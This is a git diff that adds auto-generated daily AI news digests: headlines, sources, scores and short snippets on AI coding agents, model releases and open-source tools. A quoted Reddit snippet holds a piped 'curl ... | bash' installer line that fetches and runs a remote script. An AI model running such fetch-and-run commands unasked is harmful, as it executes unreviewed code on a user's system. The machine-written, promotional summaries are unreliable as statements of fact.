[https://github.com/ttnear/Clarc](https://github.com/ttnear/Clarc) This is my first open-source project. I wanted my non-developer coworkers to be able to use Claude Code. The terminal was the wall — installing the CLI, setting up SSH keys for GitHub, approving every tool call without any real preview of what was about to happen. None of that is a problem for me but + +--- + +## [Vessel Browser: The Open Source Browser Designed for Autonomous Agents 3 days ago • 3](https://huggingface.co/blog/unmodeled-tyler/vessel-browser-for-agents) +*Hugging Face Blog* | Score: 1.00 +Tags: open_source + +--- + +## [Anthropic Launched a Figma Competitor and Nobody Is Talking About It Enough](https://x.com/theneurondaily/status/2046227398317035871) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: tool_update + +> Braygent's take on Claude Design: it reads your codebase before generating interfaces, making it fundamentally different from generic AI design tools and a direct threat to Figma. + +--- + +## [OpenMythos: The Community Rebuilt Claude Mythos in PyTorch](https://x.com/mkovarski/status/2046040942830928276) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take on OpenMythos: the community rebuilt Claude Mythos in PyTorch with 1,000+ retweets, demonstrating that open source does not wait for permission from proprietary labs. + +--- + +## [Google Assembled an Emergency Strike Team to Catch Anthropic in Coding AI](https://x.com/cryptopunk7213/status/2046226722081722761) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: agent_tool + +> Braygent's take on Google's emergency coding AI strike team: an admission they are behind Anthropic, with an ambitious goal of building a self-improving coding agent that builds future Gemini models. + +--- + +## [Scoble: X API Costs Dropping From $300/Day to $30 — Starting Tomorrow](https://x.com/Scobleizer/status/2046037305866272811) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: api_update + +> Scoble expects his X API costs to drop from $300/day to $30/day starting tomorrow. The dramatic reduction would make large-scale social media monitoring much more accessible to developers. + +--- + +## [Scoble: Built an AI to Watch the Entire AI Community on X — 40,000 Accounts in Lists](https://x.com/Scobleizer/status/2046041740420010430) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble explained his AI news monitoring system: 40,000 accounts in curated X lists, monitored by an AI agent that reads all their posts daily and surfaces the most important developments at alignednews.com. + +--- + +## [Scoble: AI Debugging Is Easy — 'Do a Complete Quality Review'](https://x.com/Scobleizer/status/2046116360477200744) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble noted that AI debugging is easy: just tell the agent to 'do a complete quality review.' The comment reflects his practical experience building production AI agent systems. + +--- + +## [Closest replacement for Claude + Claude Code? (got banned, no explanation)](https://reddit.com/r/LocalLLaMA/comments/1sqelfp/closest_replacement_for_claude_claude_code_got/) +*Reddit r/LocalLLaMA* | 20/04/2026 | Score: 1.00 +Tags: cli_tool + +> I was using Claude Pro + Claude Code pretty heavily (terminal workflow, file access, etc.) and my account just got banned with zero explanation. From what I’m seeing, this isn’t that uncommon — people getting flagged without clear reasons or support responses — so I’m trying to move on and rebuild my setup. What I’m looking for is something that actually matches BOTH sides of what Claude gave me: **1. Claude-level reasoning / writing** * strong long-form thinking * structured outputs (planni + +--- + diff --git a/data/digest-2026-04-21.md b/data/digest-2026-04-21.md new file mode 100644 index 0000000..e93abe0 --- /dev/null +++ b/data/digest-2026-04-21.md @@ -0,0 +1,126 @@ +# Stack Scout - AI News Digest +**2026-04-21** | 15 stories | Auto-generated from 644 archived stories + +--- + +## [Just open-sourced a protocol + SDK that lets Claude drive your live app (ships as a Claude Code plugin)](https://reddit.com/r/ClaudeAI/comments/1ss29p9/just_opensourced_a_protocol_sdk_that_lets_claude/) +*Reddit r/ClaudeAI* | 21/04/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool + +> https://github.com/BrainBlend-AI/tesseron Just open-sourced a protocol and TypeScript SDK I built mostly *with* Claude Code. The goal: let *Claude* (or any MCP client) drive a live application (browser tab, *Electron* / *Tauri* desktop app, Node daemon, CLI) by calling typed handlers inside your code, instead of scraping the UI with *Playwright* or *Computer Use*. It's called **Tesseron**. Ships as a Claude Code plugin, so install is one command: ``` /plugin marketplace add BrainBlend-AI/tess + +--- + +## [PowerShell v7.6.1 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.1) +*GitHub Releases · PowerShell* | 21/04/2026 | Score: 0.86 +Tags: api_update, developer_tool, cli_tool + +> ## [7.6.1] ### General Cmdlet Updates and Fixes - Delay update notification for one week to ensure all packages become available (#27215) ### Tests - Fix the `PSNativeCommandArgumentPassing` test (#27179) ### Build and Packaging Improvements

    Update to .NET SDK 10.0.202

    • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
    • Update branch for release (#27287)
    • Fix package pipeline by adding in PDP-Media direct + +--- + +## [Perplexity Computer Just Launched — OpenClaw for the Rest of Us](https://x.com/davidlee/status/2046589300188598440) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption. + +--- + +## [Open source Image Generation CLI. One binary.](https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/) +*Reddit r/StableDiffusion* | 21/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs. It uses diffusers underneath. The CLI is Rust, the GPU worker is Python. One binary, no Docker required. What it looks like: \# Install curl -fsSL https://modl.run/install | bash \# Pu + +--- + +## [@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker](https://x.com/LumaLabsAI/status/2046356064187363368) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills. + +--- + +## [I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent](https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/) +*Reddit r/ClaudeAI* | 21/04/2026 | Score: 0.94 +Tags: developer_tool, agent_tool + +> I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused. That made sense at the start. Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow. But after building a few integrations, I kept running into the same uncomfortable question: If I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C + +--- + +## [1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source + +We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. + +Core Capabilities: +• Exceptional Agentic Coding: Engineered](https://x.com/Ali_TongyiLab/status/2044771299483107739) +*X / @ali_tongyilab* | 16/04/2026 | Score: 0.86 +Tags: open_source, agent_tool + +> 1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. Core Capabilities: • Exceptional Agentic Coding: Engineered + +--- + +## [Open source CRT animation lora for ltx 2.3](https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/) +*Reddit r/StableDiffusion* | 20/04/2026 | Score: 0.62 +Tags: open_source, cli_tool + +> None of the video gen models do a real CRT terminal animation look. Weights + recipe: 🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora) + +--- + +## [LinkedIn Launched Blind AI Model Comparison — Finally a Practical Evaluation Tool](https://x.com/DataconomyMedia/status/2046589880226996228) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: tool_update + +> Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers. + +--- + +## [Scoble: I Took My AI to Stanford — It Has My Personality Now](https://x.com/Scobleizer/status/2046495684493562130) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality. + +--- + +## [I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com](https://x.com/Scobleizer/status/2046194231321190735) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon. + +--- + +## [[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)](https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds) +*Latent Space* | Score: 0.90 +Tags: open_source + +--- + +## [Framework Laptop 13 Pro](https://frame.work/laptop13pro) +*Hacker News* | 21/04/2026 | Score: 0.89 +Tags: developer_tool + +--- + +## [Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?](https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/) +*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.87 +Tags: developer_tool + +> Hi everyone, I really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup. Right now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance? I just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations + +--- + +## [ComfyUI + CUDA + Docker in a single command](https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/) +*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.86 +Tags: product_launch + +> What's up everyone! So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything. The goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA: * Uses NVIDIA Container Toolkit for GPU passthrough * Persistent storage via a Docker volume * No modifications to ComfyUI itself * G + +--- + diff --git a/data/digest-2026-04-22.md b/data/digest-2026-04-22.md new file mode 100644 index 0000000..87ad104 --- /dev/null +++ b/data/digest-2026-04-22.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-04-22** | 15 stories | Auto-generated from 587 archived stories + +--- + +## [Qwen Code v0.15.0 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0) +*GitHub Releases · Qwen Code* | 22/04/2026 | Score: 0.86 +Tags: api_update, developer_tool, tool_update + +> ## What's Changed * feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248 * feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100 * feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827 * fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g + +--- + +## [gpt-5.4 Is Patching Your Code Without Asking](https://x.com/N8Programs/status/2046725816126460254) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries. + +--- + +## [I've been using Claude Cowork since launch. Here's what actually works for non-technical tasks (no code).](https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/) +*Reddit r/ClaudeAI* | 22/04/2026 | Score: 0.78 +Tags: cli_tool, tool_update + +> I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. No terminal. No code. Just the stuff that actually works for normal knowledge work. What Cowork actually is Most AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. The big difference from regular Claude chat is it can handle multi- + +--- + +## [Vercel CLI @vercel/oidc@3.2.1 released](https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1) +*GitHub Releases · Vercel CLI* | 22/04/2026 | Score: 0.76 +Tags: developer_tool, cli_tool + +> ### Patch Changes - Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w + +--- + +## [Remotion v4.0.451 released](https://github.com/remotion-dev/remotion/releases/tag/v4.0.451) +*GitHub Releases · Remotion* | 22/04/2026 | Score: 0.70 +Tags: cli_tool, tool_update + +> ## What's Changed Fixes version mismatches appearing when running the CLI. **Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451 + +--- + +## [How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20](https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas) +*Hugging Face Blog* | Score: 1.00 +Tags: agent_tool + +--- + +## [GPT-5.5 Spud Is Rumored for Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7](https://x.com/bridgemindai/status/2046919920953282921) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships. + +--- + +## [Opensource autoregressive models](https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/) +*Reddit r/StableDiffusion* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> I am interested why there no autoregressive models like gpt-image or nano-banana in open source. Ok, i am know about hunyan, but its not competetive with google and openai. In LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models. Why qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this. + +--- + +## [Hermes Just Became a Different Kind of Agent](https://x.com/NousResearch/status/2046721845261652066) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem. + +--- + +## [Cursor Is Built on Open Source and Worth $60 Billion](https://x.com/BLUECOW009/status/2046725740134052232) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era. + +--- + +## [Crush v0.62.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.0) +*GitHub Releases · Crush* | 22/04/2026 | Score: 0.94 +Tags: product_launch + +> # 98% reduction in token usage You read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default. ## Small system prompt This was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default. Crush used to have long descriptions for tools with instruction on how to use them. Turns out that models got a lot better with time, and now the + +--- + +## [GitHub CLI now collects pseudoanonymous telemetry](https://cli.github.com/telemetry) +*Hacker News* | 22/04/2026 | Score: 0.91 +Tags: cli_tool + +--- + +## [[AINews] OpenAI launches GPT-Image-2](https://www.latent.space/p/ainews-openai-launches-gpt-image) +*Latent Space* | Score: 0.90 +Tags: product_launch + +--- + +## [Google unveils two new TPUs designed for the “agentic era”](https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/) +*Ars Technica AI* | Score: 0.82 +Tags: product_launch + +--- + +## [Prisma 7.8.0 released](https://github.com/prisma/prisma/releases/tag/7.8.0) +*GitHub Releases · Prisma* | 22/04/2026 | Score: 0.78 +Tags: product_launch + +> Today, we are excited to share the `7.8.0` stable release 🎉 **🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!** # Highlights ## ORM ### Features **Prisma Client** - Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. A larger value can improve performance + +--- + diff --git a/data/digest-2026-04-23.md b/data/digest-2026-04-23.md new file mode 100644 index 0000000..c489dce --- /dev/null +++ b/data/digest-2026-04-23.md @@ -0,0 +1,103 @@ +# Stack Scout - AI News Digest +**2026-04-23** | 13 stories | Auto-generated from 167 archived stories + +--- + +## [Gemini CLI v0.39.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0) +*GitHub Releases · Gemini CLI* | 23/04/2026 | Score: 0.86 +Tags: cli_tool, tool_update + +> ## What's Changed * refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849 * feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876 * feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544 * chore(release): bump version to 0.39.0-nightly.202604 + +--- + +## [Google Cloud launches two new AI chips to compete with Nvidia](https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [OpenAI Just Made ChatGPT a Team Sport](https://x.com/eddiboi/status/2047009433255854119) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure. + +--- + +## [Anthropic Just Sent a Fleet of Bug Hunters Into Your Code](https://x.com/AIRoboticsInt/status/2047012029169324532) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale. + +--- + +## [Character.AI Finally Remembers You](https://x.com/character_ai/status/2047030699417571565) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational. + +--- + +## [Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now](https://x.com/replicate/status/2047027042781106649) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving. + +--- + +## [One OAuth Token Brought Down Vercel, GitHub, and npm](https://x.com/Obots_ai/status/2046952458207838375) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: cli_tool + +> The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today. + +--- + +## [Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3](https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration) +*Hugging Face Blog* | Score: 0.86 +Tags: cli_tool + +--- + +## [OpenAI's response to the Axios developer tool compromise](https://openai.com/index/axios-developer-tool-compromise/) +*Hacker News* | 23/04/2026 | Score: 0.82 +Tags: developer_tool + +--- + +## [Amuse V3.3.3 Pre-release Available.](https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/) +*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.78 +Tags: product_launch + +> Amuse V3.3.3 Pre-release is now available. 4.0 release coming in July. [https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3) V3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also. Essentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything + +--- + +## [Goose v1.32.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.32.0) +*GitHub Releases · Goose* | 23/04/2026 | Score: 0.76 +Tags: api_update + +> ## ✨ Features - Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487) - Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647) - @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571) - `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600) - Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745) - Auto-compaction for goose2 context window + +--- + +## [Qwen Code v0.15.1 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1) +*GitHub Releases · Qwen Code* | 23/04/2026 | Score: 0.62 +Tags: cli_tool + +> ## What's Changed * fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525 * feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512 * fix(cli): stop slash completion render loop by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3533 * chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541 **Full C + +--- + +## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/) +*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.54 +Tags: open_source + +> I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: * Motif-Video 2B * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V. * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests. * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B) https://reddit.com + +--- + diff --git a/data/digest-2026-04-25.md b/data/digest-2026-04-25.md new file mode 100644 index 0000000..75d068b --- /dev/null +++ b/data/digest-2026-04-25.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-25** | 15 stories | Auto-generated from 689 archived stories + +--- + +## [Stop switching tabs for prompting. I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse](https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/) +*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 +Tags: mcp, open_source + +> If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session. I built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. Instead o + +--- + +## [Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)](https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/) +*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove + +--- + +## [Qwen Code v0.15.2 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2) +*GitHub Releases · Qwen Code* | 24/04/2026 | Score: 0.94 +Tags: mcp, cli_tool + +> ## What's Changed * fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559 * feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540 * fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534 * fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe + +--- + +## [Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)](https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/) +*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.86 +Tags: mcp, agent_tool + +> I built Coyns with Claude over the past several months. It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. Agents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. What Claude helped me bu + +--- + +## [Gemini CLI v0.39.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1) +*GitHub Releases · Gemini CLI* | 24/04/2026 | Score: 0.70 +Tags: cli_tool, tool_update + +> **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1 + +--- + +## [Claude estimates work in human time, not Claude time](https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/) +*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.62 +Tags: developer_tool, cli_tool + +> Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes. Sometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours. I get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa + +--- + +## [Crush v0.62.1 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.1) +*GitHub Releases · Crush* | 24/04/2026 | Score: 0.62 +Tags: api_update, open_source + +> # Stability release Open Source :tm: is all about community, and this release got some nice contributions from our loved users! ## MiniMax fix Crush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work. For context, MiniMax does not have an endpoint to validate API keys. We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix. Kudos to @flynn-eye for the help with this one! ## Fantasy fix @carsonfarmer made [ + +--- + +## [Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need](https://x.com/karpathy) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: mcp + +> Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools. + +--- + +## [AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed](https://x.com/ayirpelle/status/2029840518272975205) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: agent_tool + +> A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization. + +--- + +## [GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago](https://x.com/mercor_ai/status/2047859197593911522) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: api_update + +> GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years. + +--- + +## [ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again](https://x.com/GrishinRobotics/status/2047760472204546230) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: open_source + +> ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale. + +--- + +## [Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War](https://x.com/SakanaAILabs/status/2047849392808624332) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: product_launch + +> Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war. + +--- + +## [@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap](https://x.com/Scobleizer/status/2047736381162901665) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: tool_update + +> Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility. + +--- + +## [@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw](https://x.com/NousResearch/status/2047840294406627659) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: product_launch + +> Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor. + +--- + +## [@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs PDF, Submits to Schwab](https://x.com/jxnlco/status/2047874586310766864) +*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 +Tags: agent_tool + +> Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms. + +--- + diff --git a/data/digest-2026-04-26.md b/data/digest-2026-04-26.md new file mode 100644 index 0000000..d9786e3 --- /dev/null +++ b/data/digest-2026-04-26.md @@ -0,0 +1,127 @@ +# Stack Scout - AI News Digest +**2026-04-26** | 15 stories | Auto-generated from 311 archived stories + +--- + +## [I built a free package manager for Claude Code MCP servers (open source)](https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source, developer_tool, cli_tool + +> **What I built** Every time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit 